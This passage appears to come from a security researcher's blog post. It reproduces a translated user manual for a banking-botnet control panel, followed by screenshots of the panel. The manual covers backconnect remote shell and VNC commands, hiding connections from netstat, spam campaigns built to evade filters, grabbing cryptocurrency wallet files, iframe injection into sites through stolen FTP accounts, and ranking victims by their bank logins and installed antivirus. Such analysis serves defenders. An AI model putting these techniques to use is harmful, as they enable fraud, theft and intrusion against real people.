&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;bot_bc_add vnc &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Connect Bot &amp;gt; Backconnect Server &amp;gt; VNC Remote Display |&amp;nbsp; Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for UltraVNC client]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;bot_bc_add cmd &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Connect Bot &amp;gt; Backconnect Server &amp;gt; Remote Shell | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client ]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;bot_bc_remove &amp;lt;service&amp;gt; &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Disconnect from the bot and hide connections from &#39;netstat&#39; output]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;close_browsers&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [close all browser processes]&lt;/div&gt;
&lt;br /&gt;
And one part related to some new features:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;Q:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt; How does Mailer works?&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;u&gt;&lt;b&gt;A:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; This feature allows you to create mass-email campaigns using standard PHP tools.&lt;br /&gt;
For this feature to work correctly you need to download the script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off&lt;br /&gt;
After that press [ Config ] and fill in [Master E-Mail (for checkup) parameters: &quot;name ; email&quot; Your email for checking] and Mailer-script URL: http://www.host.com/mailer.php&lt;br /&gt;
It&#39;s possible to create a campaign using a email address list collected by a Bot using &quot;For BotID&quot; button or a new list name;email&lt;br /&gt;
Macros are supported in в Subject/Body/Attach.&lt;br /&gt;
{name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long number&lt;br /&gt;
Recommendation: To avoid being blocked by spam-filters use macro name@{hostname} in Sender (&quot;email&quot; or &quot;name ; email&quot;) field - in this case the real domain name of the sending host will be used and your emails will not end up in Spam folder.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;Q:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; How to work with File Hunter feature?&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;u&gt;&lt;b&gt;A:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; This feature allows you to work with files on the bot: get list of files matching the parameters specified under config entry &quot;FileSearch&quot;, track files updates, autoupload files and replace files on the bot.&lt;br /&gt;
Custom Download - allows you to download any file from a bot by BotID, taken that a full path to the file is known. This will work even if the file is not specified under &quot;FileSearch&quot; config entry.&lt;br /&gt;
Auto download - uploads files with a given mask without a need to specify BotID. Bot will execute the upload as soon as search conditions are given and the file found. This will work even if the file is not specified under &quot;FileSearch&quot; config entry.&lt;br /&gt;
Be careful using File Hunter to modify any files on the bot. It&#39;s main purpose is to grab *coin files(multibit.dat/litecoin.dat...) &lt;br /&gt;
Use mouse right-click to access context menu for file list.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;Q:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; Short manual for FTP Iframer&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;u&gt;&lt;b&gt;A:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; As in the case with &#39;Mailer&#39;, For this feature to work correctly you need to download the iframer script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off&lt;br /&gt;
Next, create configuration options by pressing on [ Конфигурация ]&lt;br /&gt;
Specify the script URL in URL field&lt;br /&gt;
Working mode: Just checking [ Will check the validity of FTP accounts found in the logs ]&lt;br /&gt;
Inject: [Mode: &quot;ON&quot;]&lt;br /&gt;
Inject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case if it was detected and deleted. / Add - iframe code will be added to the end of the file before &amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;]&lt;br /&gt;
Lookup depth: [ File search level on ftp-host. For example, in the following structure FTP Connection &amp;gt; public_html(1) &amp;gt; images(2) &amp;gt; gif(3)....]&lt;br /&gt;
Next, perform &#39;Accounts search&#39; and &#39;Run tasks&#39;. The statistics and results will be available after a few minutes. The script will be working in cron-mode after the first execution, so there is no need to keep the page opened.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;Q:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; Main functions and methods of &quot;Neuromodel&quot;&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;u&gt;&lt;b&gt;A:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; Neuromodel allows you to perform complex analysis of your botnet: identifying best bots, upload success rates. You can build a research matrix that includes list of bots and evaluate them against specified criteria;&amp;nbsp; the result will be calculating a score to each bot.&lt;br /&gt;
Each research matrix can contain a number of evaluation criteria. For example, you need to search the logs for the following data: Bank Acc + CC or Bank Acc + ISP E-mail &lt;br /&gt;
Create profile first and then plan the task based on required criteria.&lt;br /&gt;
&lt;br /&gt;
Task - &quot;Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is installed. Assign X score if the search criteria match&quot;&lt;br /&gt;
&lt;br /&gt;
Creating criteria:&lt;br /&gt;
1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data masks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No &amp;lt; 1 }&lt;br /&gt;
2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 trigger condition: No &amp;lt; 1 }&lt;br /&gt;
&lt;br /&gt;
Static method is used to summarize the results.&lt;br /&gt;
* **No**: simple summary. Each successful criteria match adds specified score to the bot. More matches = bigger the score.&lt;br /&gt;
Example 1: if it found 180 reports matching the criteria and the score is 2 then the final score will be &#39;180*2&#39;&lt;br /&gt;
Example 2: if &#39;Login to bankofamerica&#39; criteria&amp;nbsp; is set to &quot;&amp;gt;=&quot; &quot;3&quot; on average a day then the score will be added only for the last days specified in &#39;Days&#39; parameter.&lt;br /&gt;
Detailed: if in the last days specified in &#39;Days&#39; parameter the &#39;Login to bankofamerica&#39; criteria was matched more than 3 times on average then the bots reported will be given the score points.&lt;br /&gt;
* **Sum** Summary of produced reports&lt;br /&gt;
Score &#39;Points&#39; will be added if the amount of reports satisfying the search criteria complies with trigger condition. &lt;br /&gt;
For example, if we have `reports_count=180` and `Points=2` and trigger condition is `&amp;gt;= 180` then the score is +2.&lt;br /&gt;
* **Days**: active days summary: days containing the reports.&lt;br /&gt;
Score will be added if the amount of reports satisfying the search criteria complies with trigger condition.&lt;br /&gt;
For example, if we have reports from day before yesterday, yesterday and today and trigger condition is set to `&amp;gt;= 3` then the scores will be added.&lt;br /&gt;
* **Avg/Day**: Average/Day: average number of reports in the last 24 hours&lt;br /&gt;
* **Avg/Week**: Average/Week: average number of reports per week&lt;br /&gt;
* **Days/Week**: average number of active days per week&lt;br /&gt;
&lt;br /&gt;
Another example, search for inactive accounts:&lt;br /&gt;
&quot;Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no filters or criteria are applied&quot;&lt;br /&gt;
&lt;br /&gt;
1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit| days limit = 21 | Login no more than 3 times: e.g. login &amp;lt;=3. Meaning, if found &amp;lt;=3 reports for this criteria — add 1 to the score. | SUM() &amp;lt;=3 , 1 score }&lt;br /&gt;
&lt;br /&gt;
Full criteria list is below:&lt;br /&gt;
Condition using date/time of the first report received from the bot.&lt;br /&gt;
Condition using date/time of the last report received from the bot.&lt;br /&gt;
Condition using average online time of the bot per week or per hour.&lt;br /&gt;
Condition using a type of the report or it&#39;s content&lt;br /&gt;
&amp;gt;Presence/Lack of LUHN10(CC)&lt;br /&gt;
&amp;gt;Presence/Lack of ISP email address (pop3 or web-link)&lt;br /&gt;
&amp;gt;Presence/Lack of FTP accounts&lt;br /&gt;
&amp;gt;Search by key words&lt;br /&gt;
Condition using &quot;Installed Software&quot; reports, allows you to check for a particular software installed on the bot.&lt;br /&gt;
Condition using &quot;CMD&quot; reports, allows to use particular keywords.&lt;br /&gt;
Condition using visited one or many particular URLs&lt;br /&gt;
Condition using POST variables.&lt;/div&gt;
Minus some absolute nonsense in the description of AVG/Day, AVG/week and days/weeks&lt;br /&gt;
The author is a fecking lunatic trying to explain things that only he understand :)&lt;br /&gt;
Thanks to Malwageddon for the translation help.&lt;br /&gt;
&lt;br /&gt;
Now.. take a free tour in the infrastructure.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSGjhVuDVvfdetCWLzjsYvLS5LVICNhJYMKTwEB13fnMPiLU48ovkRAcuhbbq4spXw-qFEYIXbtmMdLK1naOS-JCYDyIY01I5tO6ytwlWKbZjelYISoY7JpoF37YvF70GDqU1TUq6mWBM/s1600/2015-11-02_17-40-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;215&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSGjhVuDVvfdetCWLzjsYvLS5LVICNhJYMKTwEB13fnMPiLU48ovkRAcuhbbq4spXw-qFEYIXbtmMdLK1naOS-JCYDyIY01I5tO6ytwlWKbZjelYISoY7JpoF37YvF70GDqU1TUq6mWBM/s400/2015-11-02_17-40-57.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dashboard:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsSeAEIMifDukG7z2vkwTH6AjAEcm2iBu4ZYlQaZ-pu2scFhDX2mMBlcRkuskBaae9jgFu5bwWSDqADM8Q4qkCxwe_KAQxJbL9PaAzN5avG0gE5v-p8gxeZ8zQvDWbKH5lUU_u8fvp10/s1600/2015-11-02_16-27-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsSeAEIMifDukG7z2vkwTH6AjAEcm2iBu4ZYlQaZ-pu2scFhDX2mMBlcRkuskBaae9jgFu5bwWSDqADM8Q4qkCxwe_KAQxJbL9PaAzN5avG0gE5v-p8gxeZ8zQvDWbKH5lUU_u8fvp10/s400/2015-11-02_16-27-01.png&quot; width=&quot;333&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
RU and UA flags, united forever :)&lt;br /&gt;
&lt;br /&gt;
exe configuration:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sNgXpfHnM4pWmetxI5qLx2B0iNMCJ9jUXP5LkSk1Vx5swpSoZeZdPrUFT3PGqkZWudloUL-fc-tq6TNTiZ4k4l4buYC_CAc3s3VgPSweOw-EMAfGiD2Dt8LFmufN4OHXE7ydaFEOKjQ/s1600/2015-11-02_18-54-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sNgXpfHnM4pWmetxI5qLx2B0iNMCJ9jUXP5LkSk1Vx5swpSoZeZdPrUFT3PGqkZWudloUL-fc-tq6TNTiZ4k4l4buYC_CAc3s3VgPSweOw-EMAfGiD2Dt8LFmufN4OHXE7ydaFEOKjQ/s400/2015-11-02_18-54-01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Operating system:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLXNqSJAuPc-QkahBQa9ENfyPlSEOkGwGjzTps6vaub3UpMq8w9LkZiXUjmFTpODfYq4y_-_c2xlLhAN_pu_kWm9yJKdJAP4aT_fqLJRj_-bYbn2Xr4yKPzIMHOFvquiMh2NZq0-IX-4/s1600/2015-11-02_16-28-12.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLXNqSJAuPc-QkahBQa9ENfyPlSEOkGwGjzTps6vaub3UpMq8w9LkZiXUjmFTpODfYq4y_-_c2xlLhAN_pu_kWm9yJKdJAP4aT_fqLJRj_-bYbn2Xr4yKPzIMHOFvquiMh2NZq0-IX-4/s400/2015-11-02_16-28-12.png&quot; width=&quot;333&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Software:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeYb52HvqR4ZeY7R7JCiHyjrjEmwf840mrw-yVWGboS3LOlxZIzSmQUvABx2lV6ALidh9Q3I6k_WmldcBtIKdH0ZpZSfcyZoqCiCP1kOtqN3HwO4Qz_Nm92oE0kg4JNeL14cPcOtv2OiI/s1600/2015-11-02_16-31-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;317&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeYb52HvqR4ZeY7R7JCiHyjrjEmwf840mrw-yVWGboS3LOlxZIzSmQUvABx2lV6ALidh9Q3I6k_WmldcBtIKdH0ZpZSfcyZoqCiCP1kOtqN3HwO4Qz_Nm92oE0kg4JNeL14cPcOtv2OiI/s400/2015-11-02_16-31-01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIkbdsymaXpNDPNRHNQBWVbjOBzO9loH7o9W98Ede5hxApxO2-a7DoYFMrh2NMgMaqYo7ZIYou9CLpELg9iDY6JqM30jhbC8Q7cq_A3KhXV_BUPRgnMx6z-BKx1zLRqsV4MHlwiApt0Xk/s1600/2015-11-02_16-31-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;317&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIkbdsymaXpNDPNRHNQBWVbjOBzO9loH7o9W98Ede5hxApxO2-a7DoYFMrh2NMgMaqYo7ZIYou9CLpELg9iDY6JqM30jhbC8Q7cq_A3KhXV_BUPRgnMx6z-BKx1zLRqsV4MHlwiApt0Xk/s400/2015-11-02_16-31-46.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfffPd9YJFcgru-kjd1St_9-u4uSkYJToJYVjT3luSwiz2_M_njWbY1wk-OZ8Mw3dBnstS71nnNc_0SxUUHQBl3csO9r6CXhnHh3CJEjNAVL_1UR6lR0qYu9oOKI2ne14xByxUjJ34m7s/s1600/2015-11-02_16-29-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfffPd9YJFcgru-kjd1St_9-u4uSkYJToJYVjT3luSwiz2_M_njWbY1wk-OZ8Mw3dBnstS71nnNc_0SxUUHQBl3csO9r6CXhnHh3CJEjNAVL_1UR6lR0qYu9oOKI2ne14xByxUjJ34m7s/s640/2015-11-02_16-29-21.png&quot; width=&quot;307&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Firewall:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmw1dKUeG-BEYz3qFD7YAGCZ5vCj35Gk1nrp3zS13Yb5itsHtbPAc2gDnLdv5GJdZ-L-G8sI06i3mMS7HDLTa0EZ3RvYV0Dcc52U8n9YtWFAuE6Y01PhUuRLFRBI7u4VBDnzpkUfyRRZI/s1600/2015-11-02_16-32-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;317&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmw1dKUeG-BEYz3qFD7YAGCZ5vCj35Gk1nrp3zS13Yb5itsHtbPAc2gDnLdv5GJdZ-L-G8sI06i3mMS7HDLTa0EZ3RvYV0Dcc52U8n9YtWFAuE6Y01PhUuRLFRBI7u4VBDnzpkUfyRRZI/s400/2015-11-02_16-32-31.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
AV:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlhTAXZX5Kp0XDg5ulZxY4sDp1fDftteO8ucdi4gszvPpPrkMR5Bf9nx2zur9auA8hGcvPlWhUup5YJbYWhadS6amDlBh86HQvgMvVnTiaVX-bQxB3IMdJmGAtaoyMhZ8HtEP4RV6qO5Y/s1600/2015-11-02_16-33-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;317&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlhTAXZX5Kp0XDg5ulZxY4sDp1fDftteO8ucdi4gszvPpPrkMR5Bf9nx2zur9auA8hGcvPlWhUup5YJbYWhadS6amDlBh86HQvgMvVnTiaVX-bQxB3IMdJmGAtaoyMhZ8HtEP4RV6qO5Y/s400/2015-11-02_16-33-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Search:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2vRu__HNLEsQlNpG5JeQ4UgXE_EPWptL-0DDd3q-UhXfpEC_0DQ2psHhOKZ2jkJUPtugpL0VmH5Iqd-5yMSWfLoAYgiHXLKtFXd2yvRMaTXmroXHgUPMHS8bRD8h84oalJCJW8L1YHg/s1600/2015-11-02_16-33-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2vRu__HNLEsQlNpG5JeQ4UgXE_EPWptL-0DDd3q-UhXfpEC_0DQ2psHhOKZ2jkJUPtugpL0VmH5Iqd-5yMSWfLoAYgiHXLKtFXd2yvRMaTXmroXHgUPMHS8bRD8h84oalJCJW8L1YHg/s400/2015-11-02_16-33-39.png&quot; width=&quot;322&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bots:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYYR3G-x4lbEQ-2dJ3HIIXkQEwGXZthrQvGwPQCxQVj46rRn378CGjUXHrAje8j5vp0I4Qk9-EiisR4vylX1qNeO-0KghzVMlTzMdPmGr7-ZNS1WtVpi1iRGo1ag2X0XYzrT1sb_Cu_L0/s1600/2015-11-02_16-35-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYYR3G-x4lbEQ-2dJ3HIIXkQEwGXZthrQvGwPQCxQVj46rRn378CGjUXHrAje8j5vp0I4Qk9-EiisR4vylX1qNeO-0KghzVMlTzMdPmGr7-ZNS1WtVpi1iRGo1ag2X0XYzrT1sb_Cu_L0/s400/2015-11-02_16-35-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;Legend:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie_QRNJrzcEiDx1kFOA7mKirYcx-RimrEDcxR_lZKaB3gDE-fXOw08cZRXE6afWWXhQgUrr3pcOvDI_WvwmkvG7xvs2XHEBIuZ_gD_MpCiaXVl_gzyNBRgSpM1Xz5gjuZ2W_aJ0SVKa9I/s1600/2015-11-02_18-45-50.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie_QRNJrzcEiDx1kFOA7mKirYcx-RimrEDcxR_lZKaB3gDE-fXOw08cZRXE6afWWXhQgUrr3pcOvDI_WvwmkvG7xvs2XHEBIuZ_gD_MpCiaXVl_gzyNBRgSpM1Xz5gjuZ2W_aJ0SVKa9I/s1600/2015-11-02_18-45-50.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Full information:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyntbBdlXvfUTVGlGIIpMLRNHO-TNjesTLaUhz6VoGZWOqA99z4m3dME0gNMT4dvs27m6ziGEEJGXjUoQ0gURFxEtWKeSSelvC7XHWwL9CeFbsfUaSh_bcV6T7kozIqyIKxSbFR4zzejk/s1600/2015-11-02_18-39-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;386&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyntbBdlXvfUTVGlGIIpMLRNHO-TNjesTLaUhz6VoGZWOqA99z4m3dME0gNMT4dvs27m6ziGEEJGXjUoQ0gURFxEtWKeSSelvC7XHWwL9CeFbsfUaSh_bcV6T7kozIqyIKxSbFR4zzejk/s400/2015-11-02_18-39-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
WebInject:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHyAf64FGvyDB5kXKL8HUdZnTUJ_E9pQ6sbxXFSiBGAziae9_hK_DzY7T9WEhhtWXrzOQ1b-ZcCTzmPfAlmtWLIX7xmU0pFbtbS_ZQSKb2jxkg6pFJVvIoA6lFVHrOZXqUA6OT9l41EY/s1600/2015-11-02_16-36-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHyAf64FGvyDB5kXKL8HUdZnTUJ_E9pQ6sbxXFSiBGAziae9_hK_DzY7T9WEhhtWXrzOQ1b-ZcCTzmPfAlmtWLIX7xmU0pFbtbS_ZQSKb2jxkg6pFJVvIoA6lFVHrOZXqUA6OT9l41EY/s400/2015-11-02_16-36-13.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Reported errors:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRSLvTWnM5uGVtAA8vsMj5d-JBPaLWOY6lcqI-vxg91XbZ83r_xpEVP6_pp9ELhXpZ4iAZ4CMjhlxR9UlQyB1J_ZVMIfgJrNyA-Kaiwwp4qKDoYztGv4RK7PRQ7XFU_cCY_DhzJkdIcJA/s1600/2015-11-17_15-25-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;278&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRSLvTWnM5uGVtAA8vsMj5d-JBPaLWOY6lcqI-vxg91XbZ83r_xpEVP6_pp9ELhXpZ4iAZ4CMjhlxR9UlQyB1J_ZVMIfgJrNyA-Kaiwwp4qKDoYztGv4RK7PRQ7XFU_cCY_DhzJkdIcJA/s400/2015-11-17_15-25-08.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
New group:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeIQ_dEfJ-G6MX-DPEP_VEb7agXU3-Xy2MZRtrqOXxBJdLp2fu_2_C_hzALazziGCcNHhc6F3EatqbGwpnDX7Kym_ErsTTKOhjZzd0RENGiXdanOcSH-UgVO8mDZ-HdGOPli5cyaXgoHA/s1600/2015-11-02_19-34-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;355&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeIQ_dEfJ-G6MX-DPEP_VEb7agXU3-Xy2MZRtrqOXxBJdLp2fu_2_C_hzALazziGCcNHhc6F3EatqbGwpnDX7Kym_ErsTTKOhjZzd0RENGiXdanOcSH-UgVO8mDZ-HdGOPli5cyaXgoHA/s400/2015-11-02_19-34-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit a webinject:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuD7zlpeXwYvIg5m4rDbVxWiPVe_ik_12L5BbWasm4dLjf9mydcYHOYGO4LYYtO1cZPZqcimWXI-XlD4H5heHcNMz4sDAtYJarXIfrjOYCa-k-cyfJIISv_W3DzbmS7jc4Mla1k890qGo/s1600/2015-11-02_16-36-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuD7zlpeXwYvIg5m4rDbVxWiPVe_ik_12L5BbWasm4dLjf9mydcYHOYGO4LYYtO1cZPZqcimWXI-XlD4H5heHcNMz4sDAtYJarXIfrjOYCa-k-cyfJIISv_W3DzbmS7jc4Mla1k890qGo/s400/2015-11-02_16-36-59.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
